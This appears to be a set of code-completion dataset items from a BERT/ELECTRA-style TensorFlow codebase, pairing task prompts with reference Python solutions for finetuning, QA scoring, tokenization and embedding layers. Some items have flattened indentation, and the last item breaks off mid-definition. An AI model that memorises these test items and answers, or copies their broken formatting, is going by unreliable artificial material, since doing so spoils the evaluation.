  # file); a single write is sufficient.
  utils.write_pickle(results, config.results_pkl)
The provided code snippet includes necessary dependencies for implementing the `run_finetuning` function. Write a Python function `def run_finetuning(config: configure_finetuning.FinetuningConfig)` to solve the following problem:
Run finetuning.
Here is the function:
def run_finetuning(config: configure_finetuning.FinetuningConfig):
  """Run finetuning.

  Trains/evaluates `config.num_trials` models with different random seeds
  (loop forever when num_trials < 0), writing metrics and, where supported,
  per-example predictions to disk after each trial.
  """
  # Setup for training
  results = []
  trial = 1
  heading_info = "model={:}, trial {:}/{:}".format(
      config.model_name, trial, config.num_trials)
  heading = lambda msg: utils.heading(msg + ": " + heading_info)
  heading("Config")
  utils.log_config(config)
  generic_model_dir = config.model_dir
  tasks = task_builder.get_tasks(config)
  # Train and evaluate num_trials models with different random seeds
  while config.num_trials < 0 or trial <= config.num_trials:
    # Each trial gets its own model dir suffixed with the trial number.
    config.model_dir = generic_model_dir + "_" + str(trial)
    if config.do_train:
      utils.rmkdir(config.model_dir)
    model_runner = ModelRunner(config, tasks)
    if config.do_train:
      heading_info = "model={:}, trial {:}/{:}".format(config.model_name, trial, config.num_trials)
      heading("Start training")
      model_runner.train()
      utils.log()
    if config.do_eval:
      if config.write_test_outputs and trial <= config.n_writes_test:
        heading("Running on the dev set and writing the predictions")
        for task in tasks:
          # Currently only writing preds for GLUE and SQuAD 2.0 is supported
          if task.name in ["cola", "mrpc", "mnli", "sst", "rte", "qnli", "qqp",
                           "sts"]:
            for split in task.get_test_splits():
              model_runner.write_classification_outputs([task], trial, split)
          elif task.name == "squad":
            scorer = model_runner.evaluate_task(task, "dev", False)
            scorer.write_predictions()
            preds = utils.load_json(config.qa_preds_file(task.name+"_dev"))
            null_odds = utils.load_json(config.qa_na_file(task.name+"_dev"))
            # Blank out answers whose no-answer odds exceed the threshold.
            for q, _ in preds.items():
              if null_odds[q] > config.qa_na_threshold:
                preds[q] = ""
            utils.write_json(preds, config.test_predictions(
                task.name, "dev", trial))
          elif task.name == "cmrc2018" or task.name == "drcd":
            scorer = model_runner.evaluate_task(task, "dev", False)
            scorer.write_predictions()
            preds = utils.load_json(config.qa_preds_file(task.name+"_dev"))
            #utils.write_json(preds, config.test_predictions(task.name, "dev", trial))
            if config.num_trials > 1:
              utils.write_json(preds, config.qa_preds_file(task.name+"_dev_"+str(trial)))
          else:
            utils.log("Skipping task", task.name,
                      "- writing predictions is not supported for this task")
      else:
        heading("Run dev set evaluation")
        results.append(model_runner.evaluate(split="dev"))
        write_results(config, results)
    if config.do_test:
      if config.write_test_outputs and trial <= config.n_writes_test:
        heading("Running on the test set and writing the predictions")
        for task in tasks:
          # Currently only writing preds for GLUE and SQuAD 2.0 is supported
          if task.name in ["cola", "mrpc", "mnli", "sst", "rte", "qnli", "qqp",
                           "sts"]:
            for split in task.get_test_splits():
              model_runner.write_classification_outputs([task], trial, split)
          elif task.name == "squad":
            scorer = model_runner.evaluate_task(task, "eval", False)
            scorer.write_predictions()
            preds = utils.load_json(config.qa_preds_file(task.name+"_eval"))
            null_odds = utils.load_json(config.qa_na_file(task.name+"_eval"))
            for q, _ in preds.items():
              if null_odds[q] > config.qa_na_threshold:
                preds[q] = ""
            utils.write_json(preds, config.test_predictions(
                task.name, "eval", trial))
          elif task.name == "cmrc2018" or task.name == "drcd":
            scorer = model_runner.evaluate_task(task, "eval", False)
            scorer.write_predictions()
            preds = utils.load_json(config.qa_preds_file(task.name+"_eval"))
            #utils.write_json(preds, config.test_predictions(task.name, "eval", trial))
            if config.num_trials > 1:
              utils.write_json(preds, config.qa_preds_file(task.name+"_eval_"+str(trial)))
          else:
            utils.log("Skipping task", task.name,
                      "- writing predictions is not supported for this task")
      else:
        heading("Run test set evaluation")
        results.append(model_runner.evaluate(split="eval"))
        write_results(config, results)
    # Keep only the final trial's model unless keep_all_models is set.
    if trial != config.num_trials and (not config.keep_all_models):
      utils.rmrf(config.model_dir)
    trial += 1
6,206 | from __future__ import print_function
from collections import Counter, OrderedDict
import string
import re
import argparse
import json
import sys
sys.setdefaultencoding('utf8')
import nltk
import pdb
def calc_f1_score(answers, prediction):
    # Token-level F1 via the longest common subsequence between each gold
    # answer and the prediction (after mixed CN/EN segmentation with
    # punctuation removed); the best score over all answers is returned.
    f1_scores = []
    for ans in answers:
        ans_segs = mixed_segmentation(ans, rm_punc=True)
        prediction_segs = mixed_segmentation(prediction, rm_punc=True)
        lcs, lcs_len = find_lcs(ans_segs, prediction_segs)
        if lcs_len == 0:
            f1_scores.append(0)
            continue
        precision = 1.0*lcs_len/len(prediction_segs)
        recall = 1.0*lcs_len/len(ans_segs)
        f1 = (2*precision*recall)/(precision+recall)
        f1_scores.append(f1)
    # NOTE(review): max() raises ValueError when `answers` is empty —
    # callers appear to guarantee at least one gold answer; confirm.
    return max(f1_scores)
def calc_em_score(answers, prediction):
    """Exact-match score: 1 if `prediction` equals any gold answer after
    punctuation removal, otherwise 0."""
    for ans in answers:
        if remove_punctuation(ans) == remove_punctuation(prediction):
            return 1
    return 0
def evaluate(ground_truth_file, prediction_file):
    """Score CMRC-style predictions against ground-truth data.

    Args:
      ground_truth_file: parsed dataset JSON ("data" -> "paragraphs" -> "qas").
      prediction_file: dict mapping question id -> predicted answer string.

    Returns:
      (f1_score, em_score, total_count, skip_count); scores are percentages
      over ALL questions, so unanswered (skipped) questions count as zero.
    """
    f1 = 0
    em = 0
    total_count = 0
    skip_count = 0
    for instance in ground_truth_file["data"]:
        #context_id = instance['context_id'].strip()
        #context_text = instance['context_text'].strip()
        for para in instance["paragraphs"]:
            for qas in para['qas']:
                total_count += 1
                query_id = qas['id'].strip()
                query_text = qas['question'].strip()  # unused; kept for parity
                answers = [x["text"] for x in qas['answers']]
                if query_id not in prediction_file:
                    sys.stderr.write('Unanswered question: {}\n'.format(query_id))
                    skip_count += 1
                    continue
                # NOTE(review): str(...).decode('utf-8') works only on
                # Python 2 (this module also calls sys.setdefaultencoding);
                # under Python 3 this line raises AttributeError.
                prediction = str(prediction_file[query_id]).decode('utf-8')
                f1 += calc_f1_score(answers, prediction)
                em += calc_em_score(answers, prediction)
    # NOTE(review): divides by zero if the dataset contains no questions.
    f1_score = 100.0 * f1 / total_count
    em_score = 100.0 * em / total_count
    return f1_score, em_score, total_count, skip_count
6,207 | import argparse
import multiprocessing
import os
import random
import tarfile
import time
import tensorflow.compat.v1 as tf
import build_pretraining_dataset
from util import utils
The provided code snippet includes necessary dependencies for implementing the `write_examples` function. Write a Python function `def write_examples(job_id, args)` to solve the following problem:
A single process creating and writing out pre-processed examples.
Here is the function:
def write_examples(job_id, args):
  """A single process creating and writing out pre-processed examples.

  Shards the OpenWebText archives across `args.num_processes` workers by
  index; worker `job_id` extracts its archives into a private tmp dir and
  feeds every text file to an ExampleWriter.
  """
  job_tmp_dir = os.path.join(args.data_dir, "tmp", "job_" + str(job_id))
  owt_dir = os.path.join(args.data_dir, "openwebtext")
  # NOTE: the inner *args intentionally shadows the outer `args` parameter.
  def log(*args):
    msg = " ".join(map(str, args))
    print("Job {}:".format(job_id), msg)
  log("Creating example writer")
  example_writer = build_pretraining_dataset.ExampleWriter(
      job_id=job_id,
      vocab_file=os.path.join(args.data_dir, "vocab.txt"),
      output_dir=os.path.join(args.data_dir, "pretrain_tfrecords"),
      max_seq_length=args.max_seq_length,
      num_jobs=args.num_processes,
      blanks_separate_docs=False,
      do_lower_case=args.do_lower_case
  )
  log("Writing tf examples")
  fnames = sorted(tf.io.gfile.listdir(owt_dir))
  # Deterministic round-robin sharding over workers, then shuffled so each
  # worker processes its archives in random order.
  fnames = [f for (i, f) in enumerate(fnames)
            if i % args.num_processes == job_id]
  random.shuffle(fnames)
  start_time = time.time()
  for file_no, fname in enumerate(fnames):
    if file_no > 0 and file_no % 10 == 0:
      elapsed = time.time() - start_time
      log("processed {:}/{:} files ({:.1f}%), ELAPSED: {:}s, ETA: {:}s, "
          "{:} examples written".format(
              file_no, len(fnames), 100.0 * file_no / len(fnames), int(elapsed),
              int((len(fnames) - file_no) / (file_no / elapsed)),
              example_writer.n_written))
    utils.rmkdir(job_tmp_dir)
    # SECURITY: extractall on an untrusted tar can write outside
    # job_tmp_dir (path traversal); the corpus is assumed trusted here.
    with tarfile.open(os.path.join(owt_dir, fname)) as f:
      f.extractall(job_tmp_dir)
    extracted_files = tf.io.gfile.listdir(job_tmp_dir)
    random.shuffle(extracted_files)
    for txt_fname in extracted_files:
      example_writer.write_examples(os.path.join(job_tmp_dir, txt_fname))
  example_writer.finish()
  log("Done!")
6,208 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import unicodedata
import six
import tensorflow.compat.v1 as tf
def convert_to_unicode(text):
  """Converts `text` to Unicode (if it's not already), assuming utf-8 input."""
  # Invalid byte sequences are silently dropped ("ignore"), not raised.
  if six.PY3:
    if isinstance(text, str):
      return text
    elif isinstance(text, bytes):
      return text.decode("utf-8", "ignore")
    else:
      raise ValueError("Unsupported string type: %s" % (type(text)))
  elif six.PY2:
    # On Python 2, `str` is bytes and `unicode` is the text type.
    if isinstance(text, str):
      return text.decode("utf-8", "ignore")
    elif isinstance(text, unicode):
      return text
    else:
      raise ValueError("Unsupported string type: %s" % (type(text)))
  else:
    raise ValueError("Not running on Python2 or Python 3?")
The provided code snippet includes necessary dependencies for implementing the `load_vocab` function. Write a Python function `def load_vocab(vocab_file)` to solve the following problem:
Loads a vocabulary file into a dictionary.
Here is the function:
def load_vocab(vocab_file):
  """Loads a vocabulary file into an OrderedDict of token -> index.

  Each line of `vocab_file` holds one token; ids are assigned in file
  order. A duplicate token would silently overwrite its earlier index.
  """
  vocab = collections.OrderedDict()
  index = 0
  with tf.io.gfile.GFile(vocab_file, "r") as reader:
    while True:
      token = convert_to_unicode(reader.readline())
      if not token:  # empty string (no trailing "\n") means EOF
        break
      token = token.strip()
      vocab[token] = index
      index += 1
  return vocab
6,209 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import unicodedata
import six
import tensorflow.compat.v1 as tf
def convert_by_vocab(vocab, items):
  """Converts a sequence of [tokens|ids] using the vocab."""
  # Body restored: the extracted snippet had a bodyless def (SyntaxError).
  output = []
  for item in items:
    output.append(vocab[item])
  return output
def convert_tokens_to_ids(vocab, tokens):
  """Map each token to its id via `vocab` (token -> id mapping)."""
  return convert_by_vocab(vocab, tokens)
6,210 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import unicodedata
import six
import tensorflow.compat.v1 as tf
def convert_by_vocab(vocab, items):
  """Look up every element of `items` in `vocab` and return the results.

  Works in both directions: token -> id with a vocab dict, or id -> token
  with an inverse vocab dict.
  """
  return [vocab[item] for item in items]
def convert_ids_to_tokens(inv_vocab, ids):
  """Map each id in `ids` to its token via the inverse vocab dict."""
  return convert_by_vocab(inv_vocab, ids)
6,211 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import unicodedata
import six
import tensorflow.compat.v1 as tf
The provided code snippet includes necessary dependencies for implementing the `whitespace_tokenize` function. Write a Python function `def whitespace_tokenize(text)` to solve the following problem:
Runs basic whitespace cleaning and splitting on a piece of text.
Here is the function:
def whitespace_tokenize(text):
  """Runs basic whitespace cleaning and splitting on a piece of text.

  Returns [] for empty or all-whitespace input; otherwise splits on runs
  of whitespace (str.split with no separator).
  """
  stripped = text.strip()
  if not stripped:
    return []
  return stripped.split()
6,212 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import unicodedata
import six
import tensorflow.compat.v1 as tf
The provided code snippet includes necessary dependencies for implementing the `_is_whitespace` function. Write a Python function `def _is_whitespace(char)` to solve the following problem:
Checks whether `chars` is a whitespace character.
Here is the function:
def _is_whitespace(char):
"""Checks whether `chars` is a whitespace character."""
# \t, \n, and \r are technically contorl characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False | Checks whether `chars` is a whitespace character. |
6,213 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import unicodedata
import six
import tensorflow.compat.v1 as tf
The provided code snippet includes necessary dependencies for implementing the `_is_control` function. Write a Python function `def _is_control(char)` to solve the following problem:
Checks whether `chars` is a control character.
Here is the function:
def _is_control(char):
"""Checks whether `chars` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat.startswith("C"):
return True
return False | Checks whether `chars` is a control character. |
6,214 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import unicodedata
import six
import tensorflow.compat.v1 as tf
The provided code snippet includes necessary dependencies for implementing the `_is_punctuation` function. Write a Python function `def _is_punctuation(char)` to solve the following problem:
Checks whether `chars` is a punctuation character.
Here is the function:
def _is_punctuation(char):
"""Checks whether `chars` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or
(cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)):
return True
cat = unicodedata.category(char)
if cat.startswith("P"):
return True
return False | Checks whether `chars` is a punctuation character. |
6,215 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import json
import math
import re
import numpy as np
import six
import tensorflow.compat.v1 as tf
from tensorflow.contrib import layers as contrib_layers
def gelu(input_tensor):
  """Gaussian Error Linear Unit (exact erf formulation).

  A smoother alternative to ReLU.
  Original paper: https://arxiv.org/abs/1606.08415

  Args:
    input_tensor: float Tensor to perform activation.

  Returns:
    `input_tensor` with the GELU activation applied elementwise.
  """
  # GELU(x) = x * Phi(x), where Phi is the standard normal CDF.
  normal_cdf = 0.5 * (1.0 + tf.math.erf(input_tensor / tf.sqrt(2.0)))
  return input_tensor * normal_cdf
The provided code snippet includes necessary dependencies for implementing the `get_activation` function. Write a Python function `def get_activation(activation_string)` to solve the following problem:
Maps a string to a Python function, e.g., "relu" => `tf.nn.relu`. Args: activation_string: String name of the activation function. Returns: A Python function corresponding to the activation function. If `activation_string` is None, empty, or "linear", this will return None. If `activation_string` is not a string, it will return `activation_string`. Raises: ValueError: The `activation_string` does not correspond to a known activation.
Here is the function:
def get_activation(activation_string):
  """Maps a string to a Python function, e.g., "relu" => `tf.nn.relu`.

  Args:
    activation_string: String name of the activation function. Anything
      that is not a string is assumed to already be an activation
      function and is returned unchanged.

  Returns:
    A Python function corresponding to the activation function, or None
    when `activation_string` is None, empty, or "linear".

  Raises:
    ValueError: The `activation_string` does not correspond to a known
      activation.
  """
  # Non-strings are assumed to already be callables.
  if not isinstance(activation_string, six.string_types):
    return activation_string
  if not activation_string:
    return None

  known_activations = {
      "linear": None,
      "relu": tf.nn.relu,
      "gelu": gelu,
      "tanh": tf.tanh,
  }
  act = activation_string.lower()
  if act in known_activations:
    return known_activations[act]
  raise ValueError("Unsupported activation: %s" % act)
6,216 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import json
import math
import re
import numpy as np
import six
import tensorflow.compat.v1 as tf
from tensorflow.contrib import layers as contrib_layers
def create_initializer(initializer_range=0.02):
  """Return a truncated-normal initializer with stddev `initializer_range`."""
  return tf.truncated_normal_initializer(stddev=initializer_range)
def get_shape_list(tensor, expected_rank=None, name=None):
  """Returns a list of the shape of tensor, preferring static dimensions.

  Args:
    tensor: A tf.Tensor object (or numpy array / list) to find the shape of.
    expected_rank: (optional) int. The expected rank of `tensor`. If this is
      specified and the `tensor` has a different rank, an exception will be
      thrown.
    name: Optional name of the tensor for the error message.

  Returns:
    A list of dimensions of the shape of tensor. All static dimensions will
    be returned as python integers, and dynamic dimensions will be returned
    as tf.Tensor scalars.
  """
  # numpy arrays and plain lists have fully static shapes; validate the
  # rank directly and return the numpy shape tuple.
  if isinstance(tensor, np.ndarray) or isinstance(tensor, list):
    shape = np.array(tensor).shape
    if isinstance(expected_rank, six.integer_types):
      assert len(shape) == expected_rank
    elif expected_rank is not None:
      # Non-int expected_rank is treated as a collection of allowed ranks
      # — presumably callers pass an int or a list/tuple of ints; confirm.
      assert len(shape) in expected_rank
    return shape

  if name is None:
    name = tensor.name

  if expected_rank is not None:
    # assert_rank is defined elsewhere in this module.
    assert_rank(tensor, expected_rank, name)

  shape = tensor.shape.as_list()

  # Collect the axes whose static size is unknown at graph-build time.
  non_static_indexes = []
  for (index, dim) in enumerate(shape):
    if dim is None:
      non_static_indexes.append(index)

  # Fast path: the shape is fully static.
  if not non_static_indexes:
    return shape

  # Fall back to dynamic shape scalars only for the unknown axes.
  dyn_shape = tf.shape(tensor)
  for index in non_static_indexes:
    shape[index] = dyn_shape[index]
  return shape
The provided code snippet includes necessary dependencies for implementing the `embedding_lookup` function. Write a Python function `def embedding_lookup(input_ids, vocab_size, embedding_size=128, initializer_range=0.02, word_embedding_name="word_embeddings", use_one_hot_embeddings=False)` to solve the following problem:
Looks up words embeddings for id tensor. Args: input_ids: int32 Tensor of shape [batch_size, seq_length] containing word ids. vocab_size: int. Size of the embedding vocabulary. embedding_size: int. Width of the word embeddings. initializer_range: float. Embedding initialization range. word_embedding_name: string. Name of the embedding table. use_one_hot_embeddings: bool. If True, use one-hot method for word embeddings. If False, use `tf.nn.embedding_lookup()`. One hot is better for TPUs. Returns: float Tensor of shape [batch_size, seq_length, embedding_size].
Here is the function:
def embedding_lookup(input_ids,
                     vocab_size,
                     embedding_size=128,
                     initializer_range=0.02,
                     word_embedding_name="word_embeddings",
                     use_one_hot_embeddings=False):
  """Looks up words embeddings for id tensor.

  Args:
    input_ids: int32 Tensor of shape [batch_size, seq_length] containing word
      ids, or a 3D float Tensor of per-token weights over the vocabulary
      that is matmul'd against the embedding table directly.
    vocab_size: int. Size of the embedding vocabulary.
    embedding_size: int. Width of the word embeddings.
    initializer_range: float. Embedding initialization range.
    word_embedding_name: string. Name of the embedding table.
    use_one_hot_embeddings: bool. If True, use one-hot method for word
      embeddings. If False, use `tf.nn.embedding_lookup()`. One hot is better
      for TPUs.

  Returns:
    An (output, embedding_table) pair: a float Tensor of shape
    [batch_size, seq_length, embedding_size] and the embedding variable.
  """
  # If the input is a 2D tensor of shape [batch_size, seq_length], we
  # reshape to [batch_size, seq_length, 1] so the lookup/reshape logic
  # below can treat both layouts uniformly.
  original_dims = input_ids.shape.ndims
  if original_dims == 2:
    input_ids = tf.expand_dims(input_ids, axis=[-1])

  embedding_table = tf.get_variable(
      name=word_embedding_name,
      shape=[vocab_size, embedding_size],
      initializer=create_initializer(initializer_range))

  if original_dims == 3:
    input_shape = get_shape_list(input_ids)
    # Bug fix: the original code called tf.reshape(input_ids, ...) here and
    # discarded the result — a no-op. tf.matmul batches over the leading
    # dimension, so the 3D input multiplies the table directly.
    output = tf.matmul(input_ids, embedding_table)
    output = tf.reshape(output,
                        [input_shape[0], input_shape[1], embedding_size])
  else:
    if use_one_hot_embeddings:
      # One-hot matmul path; typically faster on TPUs.
      flat_input_ids = tf.reshape(input_ids, [-1])
      one_hot_input_ids = tf.one_hot(flat_input_ids, depth=vocab_size)
      output = tf.matmul(one_hot_input_ids, embedding_table)
    else:
      output = tf.nn.embedding_lookup(embedding_table, input_ids)

    input_shape = get_shape_list(input_ids)
    # Fold the trailing singleton lookup axis back into the embedding axis:
    # [batch, seq, 1, emb] -> [batch, seq, emb].
    output = tf.reshape(output,
                        input_shape[0:-1] + [input_shape[-1] * embedding_size])
  return output, embedding_table
6,217 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import json
import math
import re
import numpy as np
import six
import tensorflow.compat.v1 as tf
from tensorflow.contrib import layers as contrib_layers
def layer_norm_and_dropout(input_tensor, dropout_prob, name=None):
  """Apply layer normalization, then dropout, to `input_tensor`."""
  normalized = layer_norm(input_tensor, name)
  return dropout(normalized, dropout_prob)
def create_initializer(initializer_range=0.02):
  """Truncated-normal weight initializer with the given stddev."""
  return tf.truncated_normal_initializer(stddev=initializer_range)
def get_shape_list(tensor, expected_rank=None, name=None):
  """Return the shape of `tensor` as a list, preferring static dimensions.

  Static dimensions come back as Python ints; dynamic ones come back as
  scalar tf.Tensor values taken from tf.shape.

  Args:
    tensor: A tf.Tensor object (or numpy array / list) to find the shape of.
    expected_rank: (optional) int, or collection of ints. If given and the
      tensor's rank does not match, an assertion fails.
    name: Optional name of the tensor for the error message.

  Returns:
    A list of dimensions of the shape of tensor.
  """
  # numpy arrays and lists are fully static: check rank and return directly.
  if isinstance(tensor, (np.ndarray, list)):
    static_shape = np.array(tensor).shape
    if isinstance(expected_rank, six.integer_types):
      assert len(static_shape) == expected_rank
    elif expected_rank is not None:
      assert len(static_shape) in expected_rank
    return static_shape

  if name is None:
    name = tensor.name
  if expected_rank is not None:
    assert_rank(tensor, expected_rank, name)

  shape = tensor.shape.as_list()
  dynamic_axes = [axis for axis, size in enumerate(shape) if size is None]
  if not dynamic_axes:
    return shape

  # Patch only the unknown axes with runtime shape scalars.
  runtime_shape = tf.shape(tensor)
  for axis in dynamic_axes:
    shape[axis] = runtime_shape[axis]
  return shape
The provided code snippet includes necessary dependencies for implementing the `embedding_postprocessor` function. Write a Python function `def embedding_postprocessor(input_tensor, use_token_type=False, token_type_ids=None, token_type_vocab_size=16, token_type_embedding_name="token_type_embeddings", use_position_embeddings=True, position_embedding_name="position_embeddings", initializer_range=0.02, max_position_embeddings=512, dropout_prob=0.1)` to solve the following problem:
Performs various post-processing on a word embedding tensor. Args: input_tensor: float Tensor of shape [batch_size, seq_length, embedding_size]. use_token_type: bool. Whether to add embeddings for `token_type_ids`. token_type_ids: (optional) int32 Tensor of shape [batch_size, seq_length]. Must be specified if `use_token_type` is True. token_type_vocab_size: int. The vocabulary size of `token_type_ids`. token_type_embedding_name: string. The name of the embedding table variable for token type ids. use_position_embeddings: bool. Whether to add position embeddings for the position of each token in the sequence. position_embedding_name: string. The name of the embedding table variable for positional embeddings. initializer_range: float. Range of the weight initialization. max_position_embeddings: int. Maximum sequence length that might ever be used with this model. This can be longer than the sequence length of input_tensor, but cannot be shorter. dropout_prob: float. Dropout probability applied to the final output tensor. Returns: float tensor with same shape as `input_tensor`. Raises: ValueError: One of the tensor shapes or input values is invalid.
Here is the function:
def embedding_postprocessor(input_tensor,
                            use_token_type=False,
                            token_type_ids=None,
                            token_type_vocab_size=16,
                            token_type_embedding_name="token_type_embeddings",
                            use_position_embeddings=True,
                            position_embedding_name="position_embeddings",
                            initializer_range=0.02,
                            max_position_embeddings=512,
                            dropout_prob=0.1):
  """Performs various post-processing on a word embedding tensor.

  Adds (optionally) token-type and position embeddings to the input, then
  applies layer normalization followed by dropout.

  Args:
    input_tensor: float Tensor of shape [batch_size, seq_length,
      embedding_size].
    use_token_type: bool. Whether to add embeddings for `token_type_ids`.
    token_type_ids: (optional) int32 Tensor of shape [batch_size, seq_length].
      Must be specified if `use_token_type` is True.
    token_type_vocab_size: int. The vocabulary size of `token_type_ids`.
    token_type_embedding_name: string. The name of the embedding table variable
      for token type ids.
    use_position_embeddings: bool. Whether to add position embeddings for the
      position of each token in the sequence.
    position_embedding_name: string. The name of the embedding table variable
      for positional embeddings.
    initializer_range: float. Range of the weight initialization.
    max_position_embeddings: int. Maximum sequence length that might ever be
      used with this model. This can be longer than the sequence length of
      input_tensor, but cannot be shorter.
    dropout_prob: float. Dropout probability applied to the final output tensor.

  Returns:
    float tensor with same shape as `input_tensor`.

  Raises:
    ValueError: One of the tensor shapes or input values is invalid.
  """
  input_shape = get_shape_list(input_tensor, expected_rank=3)
  batch_size = input_shape[0]
  seq_length = input_shape[1]
  width = input_shape[2]

  output = input_tensor

  if use_token_type:
    if token_type_ids is None:
      raise ValueError("`token_type_ids` must be specified if"
                       "`use_token_type` is True.")
    token_type_table = tf.get_variable(
        name=token_type_embedding_name,
        shape=[token_type_vocab_size, width],
        initializer=create_initializer(initializer_range))
    # This vocab will be small so we always do one-hot here, since it is always
    # faster for a small vocabulary.
    flat_token_type_ids = tf.reshape(token_type_ids, [-1])
    one_hot_ids = tf.one_hot(flat_token_type_ids, depth=token_type_vocab_size)
    token_type_embeddings = tf.matmul(one_hot_ids, token_type_table)
    token_type_embeddings = tf.reshape(token_type_embeddings,
                                       [batch_size, seq_length, width])
    output += token_type_embeddings

  if use_position_embeddings:
    # Fail (at graph execution time) if the sequence is longer than the
    # learned position table.
    assert_op = tf.assert_less_equal(seq_length, max_position_embeddings)
    with tf.control_dependencies([assert_op]):
      full_position_embeddings = tf.get_variable(
          name=position_embedding_name,
          shape=[max_position_embeddings, width],
          initializer=create_initializer(initializer_range))
      # Since the position embedding table is a learned variable, we create it
      # using a (long) sequence length `max_position_embeddings`. The actual
      # sequence length might be shorter than this, for faster training of
      # tasks that do not have long sequences.
      #
      # So `full_position_embeddings` is effectively an embedding table
      # for position [0, 1, 2, ..., max_position_embeddings-1], and the current
      # sequence has positions [0, 1, 2, ... seq_length-1], so we can just
      # perform a slice.
      position_embeddings = tf.slice(full_position_embeddings, [0, 0],
                                     [seq_length, -1])
      num_dims = len(output.shape.as_list())

      # Only the last two dimensions are relevant (`seq_length` and `width`), so
      # we broadcast among the first dimensions, which is typically just
      # the batch size.
      position_broadcast_shape = []
      for _ in range(num_dims - 2):
        position_broadcast_shape.append(1)
      position_broadcast_shape.extend([seq_length, width])
      position_embeddings = tf.reshape(position_embeddings,
                                       position_broadcast_shape)
      output += position_embeddings

  output = layer_norm_and_dropout(output, dropout_prob)
  return output
6,218 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import json
import math
import re
import numpy as np
import six
import tensorflow.compat.v1 as tf
from tensorflow.contrib import layers as contrib_layers
def get_shape_list(tensor, expected_rank=None, name=None):
  """Returns a list of the shape of tensor, preferring static dimensions.

  Args:
    tensor: A tf.Tensor object (or numpy array / list) to find the shape of.
    expected_rank: (optional) int. The expected rank of `tensor`. If this is
      specified and the `tensor` has a different rank, an exception will be
      thrown.
    name: Optional name of the tensor for the error message.

  Returns:
    A list of dimensions of the shape of tensor. All static dimensions will
    be returned as python integers, and dynamic dimensions will be returned
    as tf.Tensor scalars.
  """
  # numpy arrays and plain lists have fully static shapes; validate the
  # rank directly and return the numpy shape tuple.
  if isinstance(tensor, np.ndarray) or isinstance(tensor, list):
    shape = np.array(tensor).shape
    if isinstance(expected_rank, six.integer_types):
      assert len(shape) == expected_rank
    elif expected_rank is not None:
      # Non-int expected_rank is treated as a collection of allowed ranks.
      assert len(shape) in expected_rank
    return shape

  if name is None:
    name = tensor.name

  if expected_rank is not None:
    # assert_rank is defined elsewhere in this module.
    assert_rank(tensor, expected_rank, name)

  shape = tensor.shape.as_list()

  # Collect the axes whose static size is unknown at graph-build time.
  non_static_indexes = []
  for (index, dim) in enumerate(shape):
    if dim is None:
      non_static_indexes.append(index)

  # Fast path: the shape is fully static.
  if not non_static_indexes:
    return shape

  # Fall back to dynamic shape scalars only for the unknown axes.
  dyn_shape = tf.shape(tensor)
  for index in non_static_indexes:
    shape[index] = dyn_shape[index]
  return shape
The provided code snippet includes necessary dependencies for implementing the `create_attention_mask_from_input_mask` function. Write a Python function `def create_attention_mask_from_input_mask(from_tensor, to_mask)` to solve the following problem:
Create 3D attention mask from a 2D tensor mask. Args: from_tensor: 2D or 3D Tensor of shape [batch_size, from_seq_length, ...]. to_mask: int32 Tensor of shape [batch_size, to_seq_length]. Returns: float Tensor of shape [batch_size, from_seq_length, to_seq_length].
Here is the function:
def create_attention_mask_from_input_mask(from_tensor, to_mask):
  """Create 3D attention mask from a 2D tensor mask.

  Args:
    from_tensor: 2D or 3D Tensor of shape [batch_size, from_seq_length, ...].
    to_mask: int32 Tensor of shape [batch_size, to_seq_length].

  Returns:
    float Tensor of shape [batch_size, from_seq_length, to_seq_length].
  """
  from_shape = get_shape_list(from_tensor, expected_rank=[2, 3])
  batch_size = from_shape[0]
  from_seq_length = from_shape[1]
  to_seq_length = get_shape_list(to_mask, expected_rank=2)[1]

  # [batch_size, 1, to_seq_length] float mask over attended-to positions.
  to_mask = tf.cast(
      tf.reshape(to_mask, [batch_size, 1, to_seq_length]), tf.float32)

  # We don't assume that `from_tensor` is a mask (although it could be). We
  # don't actually care if we attend *from* padding tokens (only *to* padding
  # tokens), so the from-side is all ones; broadcasting against `to_mask`
  # yields the full 3D mask.
  broadcast_ones = tf.ones(
      shape=[batch_size, from_seq_length, 1], dtype=tf.float32)
  return broadcast_ones * to_mask
6,219 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import json
import math
import re
import numpy as np
import six
import tensorflow.compat.v1 as tf
from tensorflow.contrib import layers as contrib_layers
def gelu(input_tensor):
  """Gaussian Error Linear Unit (exact erf form).

  A smoother version of ReLU; see https://arxiv.org/abs/1606.08415.

  Args:
    input_tensor: float Tensor to perform activation.

  Returns:
    `input_tensor` with the GELU activation applied elementwise.
  """
  # GELU(x) = x * Phi(x), Phi being the standard normal CDF.
  normal_cdf = 0.5 * (1.0 + tf.math.erf(input_tensor / tf.sqrt(2.0)))
  return input_tensor * normal_cdf
def dropout(input_tensor, dropout_prob):
  """Apply dropout with drop probability `dropout_prob`.

  Note that `dropout_prob` is the probability of *dropping* a value,
  whereas `tf.nn.dropout` takes the probability of *keeping* one.

  Args:
    input_tensor: float Tensor.
    dropout_prob: Python float, or None to disable dropout.

  Returns:
    A version of `input_tensor` with dropout applied (or the tensor
    unchanged when dropout is disabled).
  """
  if dropout_prob is None or dropout_prob == 0.0:
    return input_tensor
  keep_prob = 1.0 - dropout_prob
  return tf.nn.dropout(input_tensor, keep_prob)
def layer_norm(input_tensor, name=None):
